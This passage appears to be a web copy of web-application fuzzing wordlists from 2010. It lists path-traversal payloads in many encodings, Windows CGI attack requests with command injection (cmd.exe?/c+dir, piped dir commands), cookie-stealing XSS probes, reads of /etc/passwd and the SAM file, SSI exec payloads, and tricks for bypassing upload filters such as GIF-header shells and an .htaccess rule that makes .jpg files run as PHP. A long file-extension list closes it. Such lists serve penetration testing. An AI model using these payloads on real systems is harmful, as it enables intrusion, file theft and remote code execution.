%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
///%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
\\\%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..//{FILE}<br />
..//..//{FILE}<br />
..//..//..//{FILE}<br />
..//..//..//..//{FILE}<br />
..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//..//{FILE}<br />
..///{FILE}<br />
..///..///{FILE}<br />
..///..///..///{FILE}<br />
..///..///..///..///{FILE}<br />
..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///..///{FILE}<br />
..\\{FILE}<br />
..\\..\\{FILE}<br />
..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\\{FILE}<br />
..\\\..\\\{FILE}<br />
..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
./\/./{FILE}<br />
./\/././\/./{FILE}<br />
./\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
.\/\.\{FILE}<br />
.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}<br />
./../{FILE}<br />
./.././../{FILE}<br />
./.././.././../{FILE}<br />
./.././.././.././../{FILE}<br />
./.././.././.././.././../{FILE}<br />
./.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././.././../{FILE}<br />
.\..\{FILE}<br />
.\..\.\..\{FILE}<br />
.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.//..//{FILE}<br />
.//..//.//..//{FILE}<br />
.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.\\..\\{FILE}<br />
.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
../{FILE}<br />
../..//{FILE}<br />
../..//../{FILE}<br />
../..//../..//{FILE}<br />
../..//../..//../{FILE}<br />
../..//../..//../..//{FILE}<br />
../..//../..//../..//../{FILE}<br />
../..//../..//../..//../..//{FILE}<br />
..\{FILE}<br />
..\..\\{FILE}<br />
..\..\\..\{FILE}<br />
..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\{FILE}<br />
..///{FILE}<br />
../..///{FILE}<br />
../..//..///{FILE}<br />
../..//../..///{FILE}<br />
../..//../..//..///{FILE}<br />
../..//../..//../..///{FILE}<br />
../..//../..//../..//..///{FILE}<br />
../..//../..//../..//../..///{FILE}<br />
..\\\{FILE}<br />
..\..\\\{FILE}<br />
..\..\\..\\\{FILE}<br />
..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\\{FILE}<br />
</pre><br />
<br />
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76) ===<br />
<pre># Common Windows CGI (Update: 17 March 2010)<br />
# fuzz inside executable directories<br />
# on windows, this is usually /scripts or /cgi-bin<br />
# adam.muntner@quietmove.com<br />
<br />
cart32.exe<br />
get32.exe<br />
visadmin.exe<br />
foxweb.exe<br />
webplus.exe?about<br />
fpsrvadm.exe<br />
MsmMask.exe<br />
cmd.exe?/c+dir<br />
cmd1.exe?/c+dir<br />
post32.exe|dir%20c:\\<br />
cgitest.exe<br />
hpnst.exe?c=p+i=<br />
Pbcgi.exe<br />
testcgi.exe<br />
webfind.exe?keywords=01234567890123456789<br />
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C<br />
test-cgi.exe?<script>alert(document.cookie)</script><br />
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['<br />
mkilog.exe<br />
mkplog.exe<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
perl.exe?-v<br />
perl.exe<br />
ppdscgi.exe<br />
c32web.exe/ChangeAdminPassword<br />
windmail.exe<br />
dbmlparser.exe<br />
cgimail.exe<br />
minimal.exe<br />
rguest.exe<br />
visitor.exe<br />
webbbs.exe<br />
wguest.exe<br />
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15<br />
cfgwiz.exe<br />
Cgitest.exe<br />
mailform.exe<br />
post16.exe<br />
imagemap.exe<br />
htimage.exe/path/filename?2,2<br />
htimage.exe<br />
Webnews.exe<br />
texis.exe/junk<br />
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/<br />
sensepost.exe?/c+dir<br />
testcgi.exe<br />
testcgi.exe?<script>alert(document.cookie)</script><br />
ion-p.exe?page=c:\winnt\repair\sam<br />
../../../../../../../../../../WINNT/system32/ipconfig.exe<br />
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf <br />
foxweb.dll<br />
wconsole.dll<br />
shtml.dll<br />
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]<br />
rightfax/fuwww.dll/?<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\<br />
GW5/GWWEB.EXE<br />
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA<br />
GW5/GWWEB.EXE?HELP=bad-request<br />
GWWEB.EXE?HELP=bad-request<br />
echo.bat<br />
echo.bat?&dir+c:\\<br />
hello.bat?&dir+c:\\<br />
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
input2.bat?|dir<br />
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
test-cgi.bat<br />
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,<br />
</pre><br />
<br />
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===<br />
<pre># File Upload Fuzzfile - File Name Filter Bypass<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
# For MIME filter bypass, your shellscript should look like<br />
# -------<br />
# GIF89aP;<br />
# [shell]<br />
# -------<br />
#<br />
# For mod_cgi Server Side Include upload attacks<br />
#<br />
#<!--#exec cmd="ls" --><br />
#<br />
#or, on Windows<br />
#<br />
#<!--#exec cmd="dir" --><br />
#<br />
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd; try setting .jpg to executable. If you can set the target directory, try fuzzing the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.<br />
#<br />
# example .htaccess that sets mime type .jpg to be executable:<br />
# -----<br />
# AddType application/x-httpd-php .jpg<br />
# -----<br />
</pre><br />
<br />
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2) ===<br />
<pre># Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2010)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) ===<br />
<pre># PHP-Specific File Upload Filter Bypass Appends (Update: 17 March 2010 - notes)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# also: use "gim" to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?><br />
# -----<br />
<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar<br />
{PHPSCRIPT}.php.doc<br />
{PHPSCRIPT}.php.xls<br />
{PHPSCRIPT}.php.xlsx<br />
{PHPSCRIPT}.php.pdf<br />
{PHPSCRIPT}.php.jpeg<br />
{PHPSCRIPT}.php.gif<br />
{PHPSCRIPT}.php.zip<br />
</pre><br />
<br />
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14) ===<br />
<pre># Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2009)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{ASPSCRIPT}<br />
{ASPSCRIPT};<br />
{ASPSCRIPT};.jpg<br />
{ASPSCRIPT};.pdf<br />
{ASPSCRIPT};.html<br />
{ASPSCRIPT};.htm<br />
{ASPSCRIPT};.txt<br />
{ASPSCRIPT};.xyz<br />
{ASPSCRIPT};.zip<br />
{ASPSCRIPT};.tgz<br />
{ASPSCRIPT};.doc<br />
{ASPSCRIPT};.docx<br />
{ASPSCRIPT};.xls<br />
{ASPSCRIPT};.xlsx<br />
</pre><br />
<br />
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9) ===<br />
<pre>#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010) <br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{HOST}/templates_compiled/<br />
{HOST}/templates_c/<br />
{HOST}/templates/<br />
{HOST}/temporary/<br />
{HOST}/images/<br />
{HOST}/cache/<br />
{HOST}/temp/<br />
{HOST}/files/<br />
{HOST}/tmp/<br />
</pre><br />
<br />
=== Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863) ===<br />
<pre><br />
#Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
<pre><br />
.$er<br />
.123<br />
.1pe<br />
.1ph<br />
.3dr<br />
.3dt<br />
.3me<br />
.3pe<br />
.4dl<br />
.4dv<br />
.8xk<br />
.^^^<br />
.a3l<br />
.a3m<br />
.a3w<br />
.a4l<br />
.a4m<br />
.a4w<br />
.a5l<br />
.a5w<br />
.a65<br />
.aao<br />
.ab<br />
.ab1<br />
.ab2<br />
.ab3<br />
.abcd<br />
.abi<br />
.abp<br />
.aby<br />
.aca<br />
.acc<br />
.accdb<br />
.acf<br />
.acg<br />
.ade<br />
.adp<br />
.adt<br />
.adx<br />
.aft<br />
.agd<br />
.aifb<br />
.alc<br />
.ald<br />
.ali<br />
.amb<br />
.amsorm<br />
.an1<br />
.anme<br />
.apr<br />
.arc<br />
.arh<br />
.ask<br />
.asm<br />
.ast<br />
.at5<br />
.att<br />
.aw<br />
.awg<br />
.azw<br />
.bafl<br />
.bci<br />
.bcm<br />
.bdf<br />
.bdic<br />
.bfx<br />
.bgl<br />
.bgt<br />
.bin<br />
.bjo<br />
.bk<br />
.bkk<br />
.blb<br />
.bld<br />
.blg<br />
.bok<br />
.box<br />
.brd<br />
.brw<br />
.btf<br />
.btif<br />
.btm<br />
.btr<br />
.cap<br />
.cat<br />
.cbg<br />
.cch<br />
.ccr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.cdx<br />
.cel<br />
.celtx<br />
.chg<br />
.chk<br />
.chn<br />
.ckd<br />
.ckt<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.clp<br />
.cmbl<br />
.cna<br />
.contact<br />
.cpi<br />
.cpmz<br />
.crd<br />
.crtx<br />
.csa<br />
.csv<br />
.ctf<br />
.ctt<br />
.cursorfx<br />
.curxptheme<br />
.cvd<br />
.cvn<br />
.cwk<br />
.cws<br />
.cwz<br />
.cxt<br />
.cyo<br />
.cys<br />
.daf<br />
.dal<br />
.dam<br />
.das<br />
.dat<br />
.data<br />
.db<br />
.db2<br />
.db3<br />
.dbc<br />
.dbd<br />
.dbf<br />
.dbx<br />
.dcf<br />
.dcl<br />
.dcm<br />
.dcmd<br />
.ddc<br />
.ddcx<br />
.ddt<br />
.dem<br />
.des<br />
.dex<br />
.dfm<br />
.dfproj<br />
.dft<br />
.dgb<br />
.dif<br />
.dii<br />
.dlg<br />
.dm2<br />
.dmo<br />
.dmsk<br />
.dnc<br />
.dockzip<br />
.dp1<br />
.dpn<br />
.dpx<br />
.drl<br />
.dsb<br />
.dsd<br />
.dsk<br />
.dsy<br />
.dsz<br />
.dt0<br />
.dt1<br />
.dt2<br />
.dta<br />
.dtr<br />
.dvdproj<br />
.dvo<br />
.dwi<br />
.e00<br />
.eap<br />
.ebuild<br />
.ec0<br />
.eco<br />
.ecx<br />
.edb<br />
.edf<br />
.eep<br />
.efx<br />
.egp<br />
.emb<br />
.emd<br />
.emlxpart<br />
.enc<br />
.enw<br />
.epp<br />
.epub<br />
.epw<br />
.er1<br />
.esp<br />
.ess<br />
.est<br />
.esx<br />
.et<br />
.eta<br />
.etd<br />
.etl<br />
.ev<br />
.ev3<br />
.evt<br />
.evy<br />
.exif<br />
.exp<br />
.exx<br />
.fa<br />
.fasta<br />
.fbl<br />
.fcd<br />
.fcs<br />
.fdb<br />
.ffd<br />
.ffwp<br />
.fhc<br />
.fid<br />
.fil<br />
.flame<br />
.fll<br />
.flo<br />
.flp<br />
.flt<br />
.fm<br />
.fm5<br />
.fmp<br />
.fo<br />
.fob<br />
.fol<br />
.fop<br />
.fox<br />
.fp<br />
.fp3<br />
.fp4<br />
.fp5<br />
.fp7<br />
.frl<br />
.frm<br />
.fro<br />
.frx<br />
.fsb<br />
.fsc<br />
.ftm<br />
.ftw<br />
.gan<br />
.gbr<br />
.gc<br />
.gcx<br />
.gdb<br />
.ged<br />
.gedcom<br />
.gen<br />
.ggb<br />
.gml<br />
.gms<br />
.gno<br />
.gnp<br />
.gp3<br />
.gpi<br />
.gps<br />
.gpx<br />
.gra<br />
.grade<br />
.grf<br />
.grib<br />
.grk<br />
.grr<br />
.grv<br />
.gs<br />
.gst<br />
.gtp<br />
.gwk<br />
.gxl<br />
.hcc<br />
.hce<br />
.hci<br />
.hcp<br />
.hcr<br />
.hcu<br />
.hda<br />
.hdb<br />
.hdf<br />
.hdi<br />
.hdl<br />
.hif<br />
.hl<br />
.hml<br />
.hmt<br />
.hs2<br />
.hsk<br />
.hst<br />
.htg<br />
.huh<br />
.hyv<br />
.i5z<br />
.ib<br />
.ics<br />
.id2<br />
.idx<br />
.igc<br />
.ihx<br />
.ii<br />
.iif<br />
.img<br />
.imt<br />
.ink<br />
.inp<br />
.ins<br />
.ip<br />
.irock<br />
.irr<br />
.irx<br />
.isf<br />
.itdb<br />
.itl<br />
.itm<br />
.itn<br />
.itw<br />
.itx<br />
.ivt<br />
.iw<br />
.ixb<br />
.jasper<br />
.jdb<br />
.jef<br />
.jmp<br />
.jnt<br />
.job<br />
.joboptions<br />
.joined<br />
.jph<br />
.jrprint<br />
.jrxml<br />
.jude<br />
.kap<br />
.kdb<br />
.kid<br />
.kismac<br />
.kmz<br />
.kpf<br />
.kpp<br />
.kpr<br />
